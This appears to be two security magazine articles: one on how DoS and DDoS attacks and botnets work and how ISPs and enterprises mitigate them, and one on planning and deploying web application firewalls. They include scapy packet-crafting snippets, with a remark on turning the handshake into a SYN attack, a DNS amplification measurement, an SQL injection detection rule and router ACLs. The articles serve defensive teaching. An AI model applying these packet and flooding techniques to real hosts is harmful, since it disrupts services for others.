In contrast to local Denial of Service attacks, network based Denial of Service attacks do not require any type of user credential. In fact, many attackers will first spoof the source address of any network based attack to hide their tracks. This is possible because IP addresses are not authenticated. The mechanism by which a TCP connection is established is called a Three Way Handshake. During this process, the client first sends the server a TCP SYN packet. In response, the server sends a SYN ACK packet to the client. When the client receives this SYN ACK packet, it sends an ACK packet to the server. At this point, the TCP connection is considered established between the client and the server (a scapy sketch of these steps follows this overview). In a Denial of Service attack, there are two ways that an attacker can interrupt this process. They can send a TCP SYN packet to the server with a spoofed source IP address, so that the server never receives an ACK: the spoofed source IP doesn't know anything about this TCP connection and will not send the TCP ACK to the server. The other way is to use a legitimate source IP but never send the TCP ACK packet. By performing this trick repeatedly, the attacker tricks the server into maintaining numerous half-open connections, exhausting the connection queue. Once this connection queue is exhausted, no new legitimate clients will be able to connect to the server [4].

Another common Denial of Service attack is called a Smurf attack. In this particular type of attack, an ICMP echo request packet is sent to a list of IP broadcast addresses; such lists are shared between hackers for this type of attack. The ICMP echo request packet that is sent, again, has a spoofed source IP address. All hosts that receive the broadcast will send an ICMP echo response to the victim, thereby multiplying the effect and overwhelming the target machine with network traffic [5].

Some denial of service attacks are low volume attacks that use carefully crafted packet formats. For instance, in the Ping of Death attack, a single ICMP packet could render a host inoperable. This packet was unique in that it had a length of 65536 bytes, whereas the IP protocol specifies that the largest size possible is 65535 bytes. It is possible to construct the Ping of Death packet by fragmenting it over multiple Ethernet frames and setting the last fragment to have the maximum offset while carrying a large amount of data. This creates an IP packet greater than the 65535 bytes allowed by RFC 791. Since TCP/IP stacks were not designed to handle IP packets larger than dictated by the RFC, this causes the system to crash. Note that this bug has subsequently been fixed on most systems [8].

Another network based Denial of Service attack is called the Land attack. In this type of attack, an attacker sends a spoofed TCP SYN packet with the source and destination IP addresses both set to that of the target machine. This will cause susceptible machines to lock up [6].
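As promised above, here is a hedged scapy sketch of the three handshake steps against a lab host; the address and ports are placeholders, and on Linux the kernel may RST the unexpected SYN-ACK unless you firewall it off first:

from scapy.all import IP, TCP, sr1, send

TARGET = "192.0.2.10"   # placeholder lab server

syn = IP(dst=TARGET)/TCP(sport=40000, dport=80, flags="S", seq=1000)   # step 1: SYN
synack = sr1(syn, timeout=2)                                           # step 2: SYN-ACK
if synack is not None and synack[TCP].flags == "SA":
    ack = IP(dst=TARGET)/TCP(sport=40000, dport=80, flags="A",
                             seq=synack.ack, ack=synack.seq + 1)       # step 3: ACK
    send(ack, verbose=False)
    print("three way handshake completed")

Withholding the final send() is precisely the legitimate-source variant of the SYN attack described above.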
All of the attacks thus far have been layer 4 and lower attacks. There are numerous application layer Denial of Service attacks that are possible:

In a mail attack, the attacker will overwhelm a target by sending its email address a lot of mail. This mail will fill up the target's inbox and likely overwhelm the target's mail server [7]. DNS flooding attacks are also common. In a DNS flood, an attacker will send a DNS request packet with a spoofed source IP address, that of the target machine. This will cause the DNS server to send the response, which happens to be much bigger, to the target. In some cases, a DNS request of 60 bytes can generate a 512 byte response [4 pp 48]; a small measurement sketch of this amplification follows below. This large amplification is exactly what an attacker is looking for in order to overwhelm a host. HTTP flooding is when a large number of HTTP requests are sent to a web server with the intention of denying service. This attack is popular because HTTP requests are typically not blocked on the path to the victim, since they are difficult to discern from legitimate HTTP traffic. A Slowloris attack is a specific HTTP based Denial of Service attack, in which a Slowloris client keeps a connection open to an HTTP server for an extended period of time. This exhausts the connection queue of the server, thereby making additional connections impossible. The client sends portions of the request slowly and thereby keeps the connection open much longer than normal. Slowloris is an example of a low bandwidth denial of service attack [9].
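The amplification ratio mentioned for DNS floods is easy to measure against a resolver you operate; the following illustrative sketch (my addition, with a placeholder resolver address) simply compares request and response sizes:

from scapy.all import IP, UDP, DNS, DNSQR, sr1

RESOLVER = "192.0.2.53"   # placeholder: your own lab resolver
query = IP(dst=RESOLVER)/UDP(dport=53)/DNS(rd=1, qd=DNSQR(qname="example.com", qtype="TXT"))
reply = sr1(query, timeout=2)
if reply is not None:
    print("request: %d bytes, response: %d bytes" % (len(query), len(reply)))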

Distributed Denial of Service Attack (DDoS)

A Distributed Denial of Service attack is a Denial of Service that is orchestrated by using many hosts, or zombie machines, scattered over the internet to target one victim. Typically these zombie machines have been previously hacked and have had DDoS malware installed. This malware allows an attacker to control the zombies from a control server. By adding this hierarchy, the attacker can cover their tracks instead of trying to launch the attack directly from their own servers. Also, from a cost perspective, it makes a lot of sense for an attacker to leverage existing hosts rather than trying to set up their own network of dedicated machines. These attacks are problematic because they are much more powerful than an attack from just a handful of hosts; in many cases, an attacker will harness a Botnet with 100,000 hosts that are involved in the attack (Figure 1).

In the DDoS architecture shown in Figure 1, a command and control setup is used. A number of bots are infected with a piece of DDoS malware that allows them to be remotely controlled. These zombie machines are controlled by DDoS Controller machines. The attacker commands the DDoS Controller machines to instruct the zombie machines on whom to attack and how to perform the Denial of Service. In order to set up this architecture, an attacker must go through many steps. First of all, they must create the Botnet malware; if an attacker doesn't have the software development skills, they will use a publicly available DDoS toolkit. The next step is to infect a large swath of machines with this malware. Classic approaches to installing malware on a machine are used: clicking on a malicious link, installing an application with the malware embedded in it, and other exploits that can run malicious code on the machine. Often an attacker will scan large portions of the internet for an un-patched vulnerability and take advantage of it to load their malware. Once the malware has been installed, the zombie machine communicates with the DDoS Controller. The source address of the DDoS Controller is often spoofed to further throw investigators off track. This communication is encrypted in some instances, but not in others. The Controller-to-Zombie communication in unencrypted instances uses ICMP echo response packets.



Figure 1. DDoS Botnet Architecture: the attacker directs DDoS Controllers, which in turn direct Zombies against the victim; communications between the tiers use encrypted, IRC, HTTP, peer-to-peer or TCP/UDP channels, and the zombies hit the victim with TCP SYN floods, HTTP floods, DNS floods and Slowloris attacks. (Source: [4] pp 40/43)

These networks are also known to use IRC channels for communication. These communication mechanisms are used because they are often allowed to traverse firewalls. More recent DDoS systems have been using peer-to-peer communication channels.

The rise of DDoS toolkits

In the past, Distributed Denial of Service attacks were carried out by lone hackers with protocol expertise and software development skills. This is unfortunately no longer the case. DDoS attacks are now orchestrated mainly by organized crime, political activists or amateur hackers, and these different actors set up and activate a DDoS attack in different ways. Organized crime will typically infect a large number of unwitting host machines with malware. This malware will be commanded from specific controller machines; the infected hosts are known as zombies. This approach differs from that of political activist hackers, or hacktivists as they are called. An example of this type of group is Anonymous. Hacktivists will actually produce a toolset and have their sympathizers download and install it on their machines. Typically, groups like Anonymous will use social media to persuade their followers to take up the cause and download the tool to help execute the denial of service attack [20]. Examples of Anonymous DDoS tools are the Low Orbit Ion Cannon (LOIC) and the High Orbit Ion Cannon (HOIC). An even more recent trend is the build-your-own-DDoS-Botnet segment of toolkits; this way, any person can set up their own Botnet and then sell their ability to launch DDoS attacks to others. There are numerous DDoS toolkits available. They can be found in hacker forums, advertised on youtube.com or even downloaded from Pastebin [10].

They differ in their communication schemes, the Denial of Service exploits they perform, and the encryption of their communication channels. These are the tools of choice for the amateur hacker, because they do not require any intricate knowledge of how to exploit a computer in order to generate a powerful DDoS attack. These DDoS Botnet toolkits generally use a few major modes of communication between their nodes. Some use custom protocols over TCP or UDP. Some use ICMP, which is allowed to pass through many firewalls at enterprise gateways. Others use protocols such as IRC or HTTP. When IRC is used as the communication channel, a bot will connect to a specific IRC server or list of servers that are hardcoded into the malware. Once it has connected to the IRC server, it will listen for commands or monitor a specific channel for commands. Using IRC as a communication channel has declined in popularity, though, because it is relatively easy to filter on; for instance, the TCP port range of 6666-6669 used for IRC communications can easily be blocked with an IDS rule. More recent Botnets have turned to HTTP as a communication protocol for command and control messages: with the volume of HTTP traffic over most networks today, it is easier to hide these command and control messages [11]. Some DDoS toolkits also use encrypted communications to conceal them. Some DDoS toolkits are smart about preventing tracing. They know that ISPs will typically trace a spoofed IP back, router interface by router interface, to locate the source; however, this process takes time. Therefore, the DDoS Botnet will pulse the attack on and off over intervals of time [3 pp 538]. A new and somewhat alarming trend is the recent adoption of build-your-own DDoS Botnet solutions.




These products, which many security researchers group into the Dirt Jumper family of DDoS Botnets, are targeted towards hackers who want to stand up their own Botnet. The hackers' motivations for using these toolkits vary, ranging from wanting to bring down a competing player in an online game, through what is called host booting, to helping one company run its competitor out of business by making the competitor's website unavailable [12]. One thing that makes this class of DDoS toolkits so troubling is that the source code is also available, which makes it possible to create spin-offs of the original; this is why Dirt Jumper is considered more of a family of DDoS toolkits than a single toolkit. As these new DDoS toolkits become more commercialized and require higher levels of development, they become more susceptible to exploitable code. Ironically, the best way to defeat a command and control based DDoS Botnet is to attack it using well known hacking methods such as buffer overflows and SQL Injection attacks. It was reported recently that the Dirt Jumper family of DDoS Botnet toolkits is susceptible to SQL Injection attacks against a control node. Once compromised, it is possible to gain access to the database behind the control node and shut down the DDoS Botnet [13]. This is a much easier approach than trying to shut down every individual zombie machine of a large DDoS Botnet.

Reducing the Incidence of DDoS Attacks

The current architecture of the internet makes it nearly impossible to quickly stop a large DDoS attack. Multiple ISPs and law enforcement typically need to be involved to shut down a large DDoS Botnet. However, there are some steps that enterprises can take to minimize the risk of their machines being involved in such an attack; if these steps proliferate across the internet, the incidence of DDoS attacks will decline.

Keep your hosts up to date with the latest security patches. The first step in setting up a DDoS Botnet is to infect an army of hosts and turn them into zombies, and this occurs by exploiting published and well known compromises. Make this harder for an attacker by religiously installing software patches as they become available.
Do not run more services than are typically required. The larger the attack surface, the larger the probability of a compromise [3].
Do not grant users more privileges than they need to do their jobs.
Look for suspicious port scan activity. Scans for known vulnerabilities are a known first step in the setup of a DDoS Botnet.
Survey your network traffic for unexpected service traffic from certain hosts to unknown public servers. This could be an indication of zombie hosts on your network that are contacting command and control servers.
Look for instances of IP spoofing on your network: for example, source addresses that don't match internally allocated addresses could indicate a problem (a small sketch of this check follows this list).
Look for large flow volumes of traffic, or really long flows. This can be done by deploying a Netflow probe at the network's egress point to monitor flow volume. Both of these cases could indicate a Denial of Service effort.
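As a rough sketch of the IP spoofing check in the list above (my illustration; it assumes Python with scapy on a host that sees outbound traffic, and the address blocks are placeholders for your own allocations):

from ipaddress import ip_address, ip_network
from scapy.all import sniff, IP

ALLOCATED = [ip_network("192.168.0.0/16"), ip_network("10.10.0.0/16")]

def check(pkt):
    # an outbound source address outside our blocks suggests spoofing
    if IP in pkt:
        src = ip_address(pkt[IP].src)
        if not any(src in net for net in ALLOCATED):
            print("possible spoofed source:", src)

sniff(iface="eth0", prn=check, store=False)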

Commercially Available Anti-DDoS Solutions
There are numerous commercial solutions advertised today, from vendors such as Arbor Networks, Imperva, Corero Network Security and Akamai Technologies, along with many others. In this section, we will discuss how these technologies work and where on the network they would typically be deployed. There are two classes of these solutions.

The first class is deployed in front of a server that requires high availability and thus needs protection from Denial of Service attacks. These solutions are typically probe based and require a person to manage them on site. They generally do not have a monthly fee associated with them. They also cannot prevent a denial of service from depleting bandwidth upstream of the server being protected. The Arbor Networks Pravail system is an example of such a solution. It can work in two different areas: in front of critical servers or as part of an ISP's DDoS protection. When placed in front of a critical server, the Pravail probe will look for application layer denial of service attacks (HTTP, DNS, SSL and VoIP) and also look for DDoS Botnet communication. Pravail links to Arbor Networks' threat intelligence to find the latest Denial of Service and Botnet communications [14]. Corero Network Security also provides a probe, called Corero DDS, that is similar in deployment and function [15].

The second class of solutions is called cloud based DDoS protection, or Managed Protection. In this class of solution, the provider will reroute a customer's traffic to its own servers as a first line of defense. Imperva offers a cloud based DDoS protection service; it routes a customer's web traffic through Imperva's DDoS protection service by changing a DNS entry, and the company claims to support up to 4 Gbps of customer traffic [16]. This has the obvious advantage of not requiring any customer premises equipment and not needing dedicated staff to operate the service. Another advantage is that the customer does not need to overprovision their network resources, which is another method that organizations use to protect their online resources. Imperva is not the only company to take this approach, as Verisign also has a similar cloud based DDoS protection system available [17]. Akamai offers a similar managed service called DDoS Defender [18]. Many service providers offer their own DDoS protection at the network level, which is an ideal place to protect your network because they can impact upstream routers by communicating with other service providers.

The correct solution for your organization depends on numerous factors: the type of uptime you require and the cost of downtime. Cloud based DDoS solutions involve a recurring cost but have a lower upfront cost. Probe based DDoS protection requires ongoing management and does not necessarily prevent points upstream of the probe from being congested. Therefore, both protection paradigms should be carefully considered before committing to one or the other.

How Does an ISP Track a DDoS Attack?

As discussed earlier, there are many different types of Denial of Service attacks. When an attack occurs, an ISP will receive an alarm that a customer's service level agreement is not being met. This could be because their link is saturated with unwanted traffic. The ISP's first step is to figure out what type of attack it is. One way this can be done is by using tcpdump to capture network traffic; one can then run the tcpdstat tool to gather summary statistics on this sample of traffic [19].
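A minimal capture-and-summarize session might look like the following (the interface name and packet count are illustrative):

# Capture a sample of traffic from the customer-facing interface
tcpdump -i eth0 -c 10000 -w ddos-sample.pcap

# Summarize the capture: protocol breakdown, rates and per-flow statistics
tcpdstat ddos-sample.pcap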

Another way this can be accomplished is by the ISP setting up access lists for various services on their routers. Once the ISP has determined which of the various types of DDoS attack it is, the next step is to throttle that specific type of traffic. There are many different types of DDoS attacks, be they TCP SYN floods, ICMP based or UDP based. Therefore, we need to know exactly which mechanism the attacker is using before we can start to mitigate the damage. The following ACL rules will help us to discover the appropriate type of attack:

access-list 169 permit icmp any any echo
access-list 169 permit icmp any any echo-reply
access-list 169 permit udp any any eq echo
access-list 169 permit udp any eq echo any
access-list 169 permit tcp any any established
access-list 169 permit tcp any any
access-list 169 permit ip any any
interface serial 0
 ip access-group 169 in

Source: [19]

Another mechanism that can be used to determine the type of attack is Netflow. Netflow is a mechanism to report on sets of packets; a flow is a set of packets between a given sender and receiver on a set of ports. Netflow reports flow summaries, including the number of packets in the flow as well as layer 3 and layer 4 information. From these Netflow reports we can determine if there is an increase in either the number of flows or the volume of the flows; either can indicate a denial of service attack. Many routers support Netflow inherently, so it is a useful mechanism. Most ISPs already use Netflow, along with SNMP, to monitor service level agreements, so it serves a dual purpose.

Once an ISP has determined the type of traffic that is attacking the victim, the next step is mitigating its effect. Since there are so many senders in a DDoS attack and they are using spoofed addresses, we would need to back track through many routers, using a combination of the MAC address and the router interface on which the packet was received, to trace back to the attacker [19]. This would need to be repeated for many zombies if they are geographically diverse and numerous. This not only requires the cooperation of many ISPs, it also requires time. Note that a DDoS attack is very costly to an organization when the server being attacked is one that generates revenue 24/7; any downtime of this server costs significant amounts of money. Therefore, most ISPs will first try to mitigate the damage by setting up an access control list to throttle the specific Denial of Service traffic. For example, if ICMP packets are the attack method, the ISP will immediately rate limit them to alleviate problems at the victim until the attacker is found. To really help the victim, the offending traffic needs to be stopped further up the chain than the victim's enterprise IDS, or even their border gateway router, because at that point much of their bandwidth has already been consumed. It becomes clear that to mitigate a DDoS attack with any success, you must coordinate with your ISP. Therefore, a clear plan of exactly whom at the ISP to call in the case of a DDoS attack should be established.

As you can see, DDoS attacks are extremely difficult to stop based on the current architecture of the internet. As an operator of a corporate or enterprise network, there are some steps that one can take to lower the chance that your network will be the source of such an attack. First of all, you should monitor your network for evidence of spoofed source addresses; there are commands on routers to verify unicast IP address sources to prevent spoofed addressing from your network. Another check is to make sure that reserved IP addresses that are not allocated on your network are not transmitting large volumes of traffic. Finally, try to ensure that your systems are patched against various exploits. This goes a long way to ensuring your machines aren't inadvertently compromised to act as part of a DDoS Botnet.
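As a rough illustration of the rate limiting and spoofing checks described above, on a Cisco-style router (the ACL number, interface name and rate values here are illustrative, not taken from the text):

! Classify the offending traffic, here ICMP echo and echo-reply
access-list 170 permit icmp any any echo
access-list 170 permit icmp any any echo-reply

interface serial 0
 ! Throttle matching traffic to 256 kbps, dropping the excess (CAR)
 rate-limit input access-group 170 256000 8000 8000 conform-action transmit exceed-action drop
 ! Drop packets whose source address fails a reverse-path check (unicast RPF)
 ip verify unicast reverse-path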

Conclusion

DDoS attacks are some of the most troubling attacks on the internet because they are extremely costly to defend against in terms of both time and money. Unfortunately, they are very inexpensive to orchestrate, even for a novice attacker, given the availability of DDoS Botnet toolkits. Therefore, we have not seen the last of these attacks, and there is evidence to suggest they are accelerating. Some best practices to prevent DDoS attacks are to make sure your hosts have been patched with the latest security updates and to verify that your network is not sending spoofed traffic or excess traffic. Further, an organization may consider purchasing a dedicated DDoS protection probe to better guarantee the availability of a server, but the more robust solution is to mitigate the problem at the ISP level. For high availability servers, a cloud based DDoS protection service may be an effective and fast solution to deploy. Enterprises should also talk with their ISP to understand the services they offer to prevent DDoS attacks.

Hari Kosaraju
has over 10 years of software engineering experience focused on Linux application development in C/C++, real time embedded systems, protocol design and deep packet inspection. He is currently a lead engineer on the Mantaro SessionVista product line of Network Intelligence Technology. This product line is used for network forensics, lawful intercept and cyber security through industry leading deep packet inspection at high data rates. Hari's interests lie in understanding network based threats and developing the technologies to detect and stop them. Hari holds a bachelor's degree in Systems and Computer Engineering from Carleton University in Ottawa, Canada. He also completed a joint MBA/MS at the Robert H. Smith School of Business at the University of Maryland, College Park.

References:
[1] http://www.informationweek.com/security/attacks/ddos-targeting-firewalls-intrusion-preve/229200274
[2] Inferring Internet Denial-of-Service Activity. David Moore, Geoffrey M. Voelker and Stefan Savage. http://www.caida.org/publications/papers/2001/BackScatter/usenixsecurity01.pdf
[3] Counter Hack Reloaded. Ed Skoudis and Tom Liston. Prentice Hall. 2006
[4] An Introduction to DDoS Attacks and Defense Mechanisms. BB Gupta. Lambert Academic Publishing. 2011
[5] http://en.wikipedia.org/wiki/Smurf_attack
[6] http://en.wikipedia.org/wiki/LAND
[7] http://en.wikipedia.org/wiki/Email_bomb
[8] http://en.wikipedia.org/wiki/Ping_of_death
[9] http://en.wikipedia.org/wiki/Slowloris
[10] http://www.securityweek.com/flaws-dirt-jumper-ddos-attacktool-let-defenders-fight-back
[11] http://tools.cisco.com/security/center/viewAlert.x?alertId=8127
[12] http://www.infosecisland.com/blogview/20997-Dirt-JumperDDoS-Botnet-Variants-Continue-to-Proliferate.html
[13] http://www.securityweek.com/flaws-dirt-jumper-ddos-attacktool-let-defenders-fight-back
[14] http://www.arbornetworks.com/pravail
[15] http://www.corero.com/en/products_and_services/dds/dds_overview
[16] http://www.infosecurity-magazine.com/view/20580/imperva-introduces-cloudbased-ddos-protection/
[17] http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/ddos/mitigation-services/index.xhtml
[18] http://www.akamai.com/html/solutions/ddos_defender.html
[19] http://www.symantec.com/connect/articles/closing-floodgates-ddos-mitigation-techniques
[20] http://www.pcmag.com/article2/0,2817,2400842,00.asp



Web Application Firewall


From Planning to Deployment
Yen Hoe Lee and Fernando Perez

The web application firewall (WAF) has been around in the information security industry for more than a decade now. However, its use is still not as widespread as desired.

Several reasons come to mind: it is a relatively large investment for an IT shop, and operating it takes specialized skills that are currently not abundant in the market. In the last couple of years, the WAF has definitely been growing more popular because of the need for compliance with standards and regulations such as the Payment Card Industry Data Security Standard (PCI-DSS). There is also better awareness in general among IT professionals of the threat vectors used for attacking the web application layer, and of the need to protect against this class of attack. This article will focus on helping you plan the deployment and operation of WAF protection for your web applications, from conception, planning, design and tests through to deployment and operation. If you already have a WAF deployed, you may gain some insight into practices that you can incorporate when expanding your WAF coverage to more web applications, or to improve the operational aspects of the WAF.

Is a Web Application Firewall right for you?

Obviously, a WAF protects web applications, especially Internet facing ones, from application layer exploits such as SQL Injection and Cross-Site Scripting, among other exploits. However, the type of application may determine the effectiveness of WAF protection. For example, a web application that is content management in nature requires either extensive tuning or the removal of some WAF protection rules in order for the application to continue to function as designed. In a defense in depth architecture, there would then need to be more reliance on protection at other layers. In a situation like this, something other than a traditional WAF may be considered. A traditional WAF is one that sits in the span port off a network device (see Figure 2). There are some WAF technologies that allow a more context aware protection of the application and that do not sit in the span

port off a network device. This class of technology generally works this way: there is a hook into the functions in memory of the application. The rest of the operation is similar to a traditional WAF; the request data is inspected, and if it violates any rules, the request is terminated. The advantage of this kind of WAF is that, because it is not merely inspecting input data at the web request layer like a traditional WAF, it is more accurate in forestalling an imminent data leak due to exploits such as SQL Injection. The flip side is that the application has to run on a platform that lends itself to this kind of hook; while both the Microsoft .NET and Oracle Java platforms are well established platforms for this kind of hook, support on other platforms should be examined carefully. Another consideration is compatibility with profilers. Profilers that generate performance data often use the same mechanism to hook into applications. If a profiler is running alongside, there should be a compatibility test to ensure both run together without glitches. If a web application is designed from the ground up with secure coding practices, and has passed extensive penetration testing, does it require a WAF? After all, a WAF protects against application layer vulnerabilities that the application should mitigate anyway. Practically, that is an ideal state that often takes tremendous resources to achieve all the time; at the very least, a WAF should help block probing traffic, which translates to a slight improvement in the load on the servers, and the data that it logs can also be used for security analysis of web application traffic.

Choices between a traditional WAF and a cloud based WAF

If you are thinking of using a WAF to protect your web application today, there is one more option than there was a couple of years ago. Besides the traditional WAF that you can purchase and put


into your data center, there is a cloud offering of web application firewalls. If you are a small or medium business and the web application presence is an important asset to the company, using a cloud based WAF will allow you to avoid making one big investment and also avoid the operational cost of keeping in-house resources for operation and maintenance. There is an opportunity to choose from different cloud based WAF providers. It would be interesting to consider the other aspects of assessing a WAF, such as the fact that the application in some cases will be in a different hosting environment; however, this article will not go into choosing a cloud based WAF. This article will focus on helping you implement a WAF from concept to deployment and the continuous operation of this technology. Much of the material discussed is applicable to cloud based WAFs as well.

How to evaluate WAF

There are online resources available to help you get started with evaluating WAF products. A lot of criteria are listed in The Web Application Firewall Evaluation Criteria (http://projects.webappsec.org/WAFEC-1-HTML-Version). This website has a spreadsheet that evaluates many aspects of a WAF, such as the deployment architecture, detection and protection techniques, management and performance. If you send this document to major WAF vendors hoping that you could score and differentiate their responses, you may be disappointed, because most of the major vendors would be able to meet most if not all of the criteria set out. If you have a proof of concept phase where you put the technology to the test, there are really two high level areas on which you could focus your evaluation:

How fast the WAF product can be deployed in blocking mode. Blocking mode is where a web request that violates rules will not be allowed to complete. The other mode is monitoring mode, where the web request is inspected for violations but nothing else is performed.

The flexibility of tuning rules to allow maximal coverage and minimal waivers. Some legitimate web requests may look like offensive ones that violate rules. If a rule cannot be tuned to a level where it can differentiate legitimate requests from offensive ones, that rule may have to be lifted (or waived, turned off) so that the application can continue to function.

If you have a small set of applications targeted for the proof of concept, obviously testing on these applications will help you make your decision. If you are protecting an enterprise with many different kinds of application, you may not get to test the WAF on every application. You should try to pick applications based on the kind of input they take. This would be the suggestion on the kinds of applications to pick:

Transactional applications, such as an online shopping application.
Content management applications, or applications that allow editing of HTML pages.
Off the shelf applications that are deployed with some customization only.
Web Services.

Each of these application types will give the WAF a different set of challenges in the two high level areas for evaluation stated earlier. The tests will give you a better understanding of the extent and limits of the protection of each WAF product under evaluation.

Deploying your first application under WAF protection

Deploying WAF protection for an application should not be treated as merely the implementation of a tool; instead it should be treated as a program. The WAF implementation should be a combination of activities designed to successfully meet the WAF's ultimate goal of providing an effective layer of protection for the organization's Internet facing web applications. At a minimum the WAF program should consider the following:

WAF Models
Operational Skills and Resources
WAF Tuning
Logging and Monitoring

Figure 1. Basic Network Layer Firewall Diagram

It is important to understand the differences between a WAF and a network layer firewall. While both a WAF and a network layer firewall are policy enforcement points in the network, they inspect different layers of the traffic. A network firewall's primary objective is to control inbound and outbound network traffic by analyzing the data packets and determining whether they should be allowed or blocked. It creates a policy enforcement point between a segment of the network that is considered to be trusted or secured, and the Internet or another segment that may be deemed insecure or high risk. A WAF inspects the OSI layer 7 traffic for violations based on a predefined security policy. It is used as a policy enforcement point between the organization's presentation layer and the web servers. A traditional, appliance-based WAF will typically be placed directly behind an organization's outermost firewall or a network device like a switch or load balancer, and in front of the web servers. In some cases, WAF functionality can be found as an additional module in some of the most popular commercial firewalls, switches and load balancers, so a separate appliance is not needed.

WAF models

There are generally two security models available in WAFs: the positive and the negative model. The positive model will white-list the application traffic to known, legitimate web requests only and block all other web requests. Generally, this model will require more tuning effort before going into blocking mode, but will provide a higher level of protection than the negative model. From a resource perspective, this model requires more attention and processes built around it to ensure proper continual operation. With the positive model, every time the application changes, monitoring and tuning will be required to ensure that the WAF learns the new application traffic and that changes to the application do not trigger violations.

The negative model, on the other hand, will block a web request only when it matches a black-list or signature file. This model analyzes the web application requests against a predefined set of signatures that identify known web application attack vectors and vulnerabilities. These attack vectors are identified by different resources in the industry, such as:

research performed by industry groups such as The SANS Internet Storm Center and The Open Web Application Security Project (OWASP)
research performed by the WAF vendor
known attacks

These signature files are updated by the WAF vendor, in a way similar to how an antivirus system updates its signatures. Compared to the positive model, the negative model requires less effort in monitoring and tuning. This translates to fewer resources and less time to deploy.

A recommended approach to achieve a balance of effort and level of protection is to use a combination of the positive and negative models. This approach combines the use of signature based protection (negative model) with targeted policy checks that filter based on criteria that the application team knows are unnecessary for the normal operation of the application (positive model). For example:

Blocking of specific file types;
Defining the expected length of an application request; and
Blocking of specific parameters or characters that are not expected in the user input.

By using targeted policy checks in the WAF positive model together with the negative model, there is a balance between the effectiveness of the WAF and the level of resources needed for tuning and supporting the tool.
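As an illustration of the two models, here is what a negative-model signature and a positive-model input check might look like in the open source ModSecurity rule language (ModSecurity is not covered by this article; the rule IDs, the parameter name and the patterns are illustrative assumptions):

# Negative model: deny any argument matching a known SQL injection signature
SecRule ARGS "@rx (?i)union[\s/*]+select" \
    "id:100001,phase:2,deny,status:403,msg:'SQL injection signature matched'"

# Positive model: for this parameter only a short numeric value is legitimate
SecRule ARGS:account_id "!@rx ^[0-9]{1,10}$" \
    "id:100002,phase:2,deny,status:403,msg:'Unexpected input for account_id'"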

Operational resources

It is important to understand the set of skills needed to deploy and operate WAF protection for applications. While network and server administrators are important resources with the skills to participate in the deployment and the infrastructure support of the WAF, networking and server administration skills are not enough to run, manage and operate the WAF deployment and operation end-to-end. It takes a team with different skills to deploy and operate WAF protection for applications. An organization deploying a WAF will need to involve at a minimum the following groups:

Network Engineering: This team will be responsible for managing the infrastructure supporting the WAF and will potentially manage the operational aspects of the WAF. In some organizations this role may be performed by a Security Operations team.

Information Security, specifically Application Security: This team will define the policy configuration for the WAF. This team will review any suspicious web application requests identified as violations by the WAF, and be responsible for approving changes to the WAF rules. The security practitioners involved must be proficient in web application security and vulnerabilities. They should also have a good understanding of the web application threat landscape.

Application Development: This team is often overlooked in the deployment of a WAF. They provide the crucial information on which web requests are legitimate and which are not, since they have the most reliable knowledge about the application.

These groups will need to work in collaboration, as an implementation team, in order to achieve a successful WAF implementation.

WAF tuning

The WAF tuning process requires the WAF to be set to monitoring mode. In this mode, all web request traffic for the application is allowed through the web application firewall without being blocked. The WAF is set to capture and report violations. The WAF implementation team needs to review these violations, and either accept them as legitimate traffic or tweak the rules so that they no longer trigger violations. This process is repeated until all violations are addressed.

When a positive model is used, the tuning effort will always be higher. The complexity of the application will also impact the level of effort needed. In this case, the complexity is determined by the number of inputs, the type of input expected, and how dynamically the application pages are generated. A negative model requires comparatively less tuning effort. However, careful consideration is needed to ensure that a vulnerability is not left unaddressed by relaxing signatures


that allow exploitation. It is important to remember that in a defense in depth architecture, application security vulnerabilities should still be addressed in the application itself. It is imperative that applications are developed or patched following secure coding guidelines.

When using a hybrid model (positive and negative), there will still be a need for tuning. However, it will not require as much time as a positive model only implementation. When tuning a hybrid model, the level of effort required for tuning will be impacted by the complexity of the application. Since the policy checks enforced are selected based on what is pertinent to the application, the tuning level of effort usually does not increase drastically. The assumption is that during the tuning period there should only be legitimate web request traffic. If the application is in a network environment that has penetration testing or other probing traffic running against the application, it will add to the complexity and effort of the tuning process. Given this assumption, it is best to do the tuning of a WAF in a non-production environment. The non-production environment should resemble the production environment, but with access for the development team to generate application traffic that mimics legitimate production traffic. Usually regression testing can help generate the desired traffic. Some organizations may decide to use a pre-production environment, where there is Internet traffic, to ensure that an environment that resembles production is used during the tuning. However, this often raises the level of effort, because both legitimate and illegitimate traffic (attacks or probes) need to be evaluated. The use of this environment should come after, not before, tuning is completed.

Logging and monitoring

An important part of a WAF product is the capability of originating event logs. As part of the WAF implementation, an event logging and monitoring process must be implemented. While the WAF should block most of the attack vectors coming for the application, monitoring the event logs generated can help determine whether any threats are occurring against the application. The use of a Security Information and Event Manager (SIEM) tool could simplify the monitoring of event logs for the WAF. Since a SIEM is often supported in a Security Operations Center (SOC), an Incident Response team could help define security triggers to look for threats.

Another benefit of reviewing the WAF event logs is that it can help identify possible issues in the application code or logic, or simply poor practices by the application developers. As an example, consider the following scenario: An application team opens a trouble ticket reporting that a needed application request has been blocked by the WAF. When the collected event logs are reviewed, it is noted that the blocked web application request was triggered by a directory traversal attack vector. When the information security team asks the application team about this request, the application team discloses that this is built-in functionality of the application that allows the use of directory traversal via a user input field. This is inherently high risk behavior for a web application, and it would not have been discovered unless the event logs were monitored and reviewed.

Challenges in deploying WAF

The success of a WAF program could have unintended consequences: "Now with the WAF in place ALL of our problems with application security are resolved." In a defense in depth architecture, this is a self-defeating proposition. Defining an operational process that will support the WAF can be another challenge. First, a WAF policy or standard must be defined to ensure that the guiding principles around the WAF are set in the organization. Secondly, it is important to involve the appropriate teams to support and manage not only the WAF infrastructure, but also the expansion of WAF coverage to applications. Thirdly, the organization must ensure that the teams involved work in collaboration to properly define the processes, procedures, roles and boundaries of the WAF program.

Finding the best protection model for your application landscape can be a challenge. The following questions should serve as a guide:

What is the organization's application universe?
How complex are the applications in this universe?
Does the organization have the expertise and skills needed to deploy and support the WAF?
Does the organization have the right amount of resources to support the WAF?

While a WAF will protect against the majority of application security threats, there is one threat that the WAF may not be able to protect against: undetected application defects and logical flaws. This can only be mitigated by ensuring that proper development testing is performed prior to production rollout. Testing should include at a minimum QA testing, user acceptance testing, security source code reviews, web application security assessments and exploitation testing via web application penetration analysis. WAF tuning may help to protect against defects and logical flaws once these are discovered and known, but this should always be considered a temporary solution.

Conclusion

The WAF is an important application security tool that can raise the security posture of an organization. However, its deployment involves a cross-disciplined team of resources that often would not otherwise have reason to work closely together. It is not only important to select the right tool for the job, but also to set up the right organization and workflow to support the expansion of WAF protection coverage beyond a few web applications.

Yen Hoe Lee


